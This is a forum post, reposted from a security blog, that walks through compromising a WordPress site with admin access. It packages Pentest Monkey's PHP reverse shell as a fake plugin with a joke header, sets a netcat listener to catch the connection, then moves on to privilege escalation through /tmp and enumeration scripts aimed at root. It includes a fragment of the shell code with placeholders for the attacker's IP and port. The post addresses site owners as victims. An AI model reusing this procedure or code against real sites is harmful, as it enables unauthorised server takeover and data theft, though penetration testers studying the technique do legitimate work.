Jump to content

How to create a Fake WordPress Plugin/Theme for Reverse Shell

Recommended Posts

Shout out to Chaos Monkey and DustinFinn on Twitter


Did you ever want to know how hackers get a reverse shell by compromising your WordPress install? Well wonder no more!


After obtaining admin access to your WordPress (this means we either leveraged a vulnerability on your site with an existing vuln that you didn’t patch, guessed your password, or cracked the hash if we were able to obtain it, also by leveraging a vuln) we trick your WordPress into thinking we’re installing a plugin when in reality we’re uploading a shell script which connects us to your underlying file server.


So the pre-req is to have admin access to the WordPress site in order for this vector to work. We cannot add plugins or themes as a guest or some other user.


After that we go into the Plugins section of the dashboard and add a new one.


On our attack box (this is the computer we are going to use to catch the shell into your fileserver) we open up a Netcat listener by going into Terminal and typing something like this:

nc -lvp 1337

nc stands for Netcat


-lvp Is listen, verbose and port


1337 is the port number on our attack box we are listening on



We then create a text file which will contain our shell. For this example let’s use Pentest Monkey’s reverse shell

On Kali Linux it is located here:


We copy the contents of the reverse shell into the blank text file.


At the top of the file, right under <?php


We insert the lines needed for a WordPress Plugin called a header:


It doesn’t matter what it says


The header starts with /* and ends with */

Plugin Name: BlackRoomSec's Evil Reverse Shell
Plugin URI: https://www.blackroomsec.com
Description: Gets Tara into your cybers, duh!
Version: 1.0 baby
Author: BRS
Author URI: http://www.blackroomsec.com
Text Domain: evil-shell
Domain Path: /languages

Then underneath that is the shell script (I snipped this)

set_time_limit (0);
$VERSION = "1.0";
$ip = ''; // CHANGE THIS
$port = 1337; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
// Daemonise ourself if possible to avoid zombies later
// pcntl_fork is hardly ever available, but will allow us to daemonise

We change these two lines

$ip = ''; // CHANGE THIS
$port = 1337; // CHANGE THIS

to the IP address of our attack box we are using to catch the shell.


If we’re practicing and doing the attack on a vulnerable machine on our own network or on the same subnet, nothing else is needed.


However, in some cases if we are attacking a site on the Internet and want to reverse that into our box we have to either forward our ports to accepting incoming traffic




We can use an attack box that is publicly accessible like a free-tiered Amazon EC2 instance or Google instance.


In that case we would use the Public IP address of that system and start a Netcat listener on THAT system and then issue commands from there.


The file then gets saved.


We then compress the file in .ZIP format as that is the format needed for WordPress plugins and themes.


We click install inside WordPress.


It says it installs.


And then once we hit “activate” our shell will be popped in our Terminal that was listening on port 1337.


This gets us in as the www-data user typically. Or, in other words, GUEST.


We now need to escalate our privileges by finding a way further into the box. This involves a number of enumeration techniques but typically we will first find a directory that www-data can access and write to.  Usually the /tmp/ directory.


How we test write capabilities is we issue the command

touch test

Where touch is the command to create a blank file and “test” is the name of the file. You can call it anything.


Then we will copy our enumeration scripts into the files we create.


Make them executable. (chmod +x filename)


And run them and see what the results give us.


Our goal is to get to the root user.


Once we get root it’s an End Game scenario for you. We have complete control over your fileserver. Can create users, delete them, change passwords, anything we want.


DM me on Twitter with questions. I have them open again for the time being.


Source: blackroomsec.com


Edited by OKQL
  • Upvote 1

Share this post

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Create New...